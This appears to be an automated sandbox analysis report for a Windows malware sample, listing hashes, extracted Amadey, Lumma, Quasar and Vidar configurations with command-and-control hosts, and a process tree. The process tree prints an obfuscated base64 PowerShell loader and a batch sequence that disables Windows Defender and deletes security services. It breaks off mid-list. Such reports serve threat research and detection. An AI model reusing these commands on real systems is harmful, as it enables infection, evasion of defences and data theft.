Analysis

  • max time kernel
    84s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/04/2025, 07:24

General

  • Target

    random.exe

  • Size

    1.8MB

  • MD5

    86428a8e81fd73f31a5730758e8d90a6

  • SHA1

    499eab8ce96089bd54ef95693096525938b5c286

  • SHA256

    4facc56a1012801ac81d763f53d57c6c35ed4948945aa925df96cdaa30b1b90f

  • SHA512

    be10c0a63d32a64563ab36033da9fac85648693e95dcfe4d72ae2e339a6a257ac731ac545fbbd80091b15a4830ca36d32b53a8fc46239c228ec17e84df44b156

  • SSDEEP

    49152:uHyrY8pYiaext5gwu4niwDC+KWrsrj0prynVia3:udiaa5Nniwe+DrKgkB

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://ironloxp.live/aksdd

https://metalsyo.digital/opsa

https://navstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://gspacedbv.world/EKdlsk

https://1galxnetb.today/GsuIAo

https://3starcloc.bet/GOksAo

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://cosmosyf.top/GOsznj

https://hcosmosyf.top/GOsznj

https://hywnnavstarx.shop/FoaJSi

https://1targett.top/dsANGt

https://srlxspoty.run/nogoaz

https://jrxsafer.top/shpaoz

https://1krxspint.digital/kendwz

https://.w0rhxhube.run/pogrs

https://grxeasyw.digital/xxepw

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

vidar

Version

13.3

Botnet

928af183c2a2807a3c0526e8c0c9369d

C2

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes
  • user_agent

    Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Extracted

Family

gcleaner

C2

185.156.73.98

45.91.200.135

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Vidar Stealer 29 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 15 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 35 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 13 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of FindShellTrayWindow 30 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4616
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3416
      • C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe
        "C:\Users\Admin\AppData\Local\Temp\10420350101\dojG16n.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4632
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:956
      • C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe
        "C:\Users\Admin\AppData\Local\Temp\10421080101\PJ7KEk9.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2164
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:5756
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1536
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5992
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10423251121\izP7K34.cmd"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5000
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
              5⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5924
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1512
        • C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe
          "C:\Users\Admin\AppData\Local\Temp\10424020101\4WMUMmx.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1036
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:6068
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 1152
              5⤵
              • Program crash
              PID:4204
        • C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe
          "C:\Users\Admin\AppData\Local\Temp\10425140101\apple.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5844
          • C:\Users\Admin\AppData\Local\Temp\261.exe
            "C:\Users\Admin\AppData\Local\Temp\261.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:6128
            • C:\Windows\system32\cmd.exe
              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E37A.tmp\E37B.tmp\E37C.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:6044
              • C:\Users\Admin\AppData\Local\Temp\261.exe
                "C:\Users\Admin\AppData\Local\Temp\261.exe" go
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2844
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E4C2.tmp\E4C3.tmp\E4C4.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
                  7⤵
                  • Drops file in Program Files directory
                  • Suspicious use of WriteProcessMemory
                  PID:4572
                  • C:\Windows\system32\sc.exe
                    sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                    8⤵
                    • Launches sc.exe
                    PID:3020
                  • C:\Windows\system32\sc.exe
                    sc start ddrver
                    8⤵
                    • Launches sc.exe
                    PID:3664
                  • C:\Windows\system32\timeout.exe
                    timeout /t 1
                    8⤵
                    • Delays execution with timeout.exe
                    PID:4128
                  • C:\Windows\system32\sc.exe
                    sc stop ddrver
                    8⤵
                    • Launches sc.exe
                    PID:4628
                  • C:\Windows\system32\sc.exe
                    sc start ddrver
                    8⤵
                    • Launches sc.exe
                    PID:5132
                  • C:\Windows\system32\takeown.exe
                    takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:5680
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                    8⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:836
                  • C:\Windows\system32\sc.exe
                    sc stop "WinDefend"
                    8⤵
                    • Launches sc.exe
                    PID:4664
                  • C:\Windows\system32\sc.exe
                    sc delete "WinDefend"
                    8⤵
                    • Launches sc.exe
                    PID:5624
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                    8⤵
                      PID:5276
                    • C:\Windows\system32\sc.exe
                      sc stop "MDCoreSvc"
                      8⤵
                      • Launches sc.exe
                      PID:5824
                    • C:\Windows\system32\sc.exe
                      sc delete "MDCoreSvc"
                      8⤵
                      • Launches sc.exe
                      PID:5056
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                      8⤵
                        PID:5380
                      • C:\Windows\system32\sc.exe
                        sc stop "WdNisSvc"
                        8⤵
                        • Launches sc.exe
                        PID:4336
                      • C:\Windows\system32\sc.exe
                        sc delete "WdNisSvc"
                        8⤵
                        • Launches sc.exe
                        PID:2120
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                        8⤵
                          PID:1360
                        • C:\Windows\system32\sc.exe
                          sc stop "Sense"
                          8⤵
                          • Launches sc.exe
                          PID:1592
                        • C:\Windows\system32\sc.exe
                          sc delete "Sense"
                          8⤵
                          • Launches sc.exe
                          PID:6064
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                          8⤵
                            PID:2836
                          • C:\Windows\system32\sc.exe
                            sc stop "wscsvc"
                            8⤵
                            • Launches sc.exe
                            PID:5944
                          • C:\Windows\system32\sc.exe
                            sc delete "wscsvc"
                            8⤵
                            • Launches sc.exe
                            PID:4832
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                            8⤵
                            • Modifies security service
                            PID:1712
                          • C:\Windows\system32\sc.exe
                            sc stop "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:5180
                          • C:\Windows\system32\sc.exe
                            sc delete "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:2348
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                            8⤵
                              PID:5920
                            • C:\Windows\system32\sc.exe
                              sc stop "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:6100
                            • C:\Windows\system32\sc.exe
                              sc delete "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:3476
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                              8⤵
                                PID:4804
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:4364
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:720
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                8⤵
                                  PID:4240
                                • C:\Windows\system32\sc.exe
                                  sc stop "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:3456
                                • C:\Windows\system32\sc.exe
                                  sc delete "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:4980
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                  8⤵
                                    PID:5932
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:4960
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:2388
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                    8⤵
                                      PID:3620
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:1320
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:2848
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                      8⤵
                                        PID:5156
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2912
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:1860
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                        8⤵
                                          PID:5592
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:5756
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:3528
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                          8⤵
                                            PID:1328
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2520
                                          • C:\Windows\system32\sc.exe
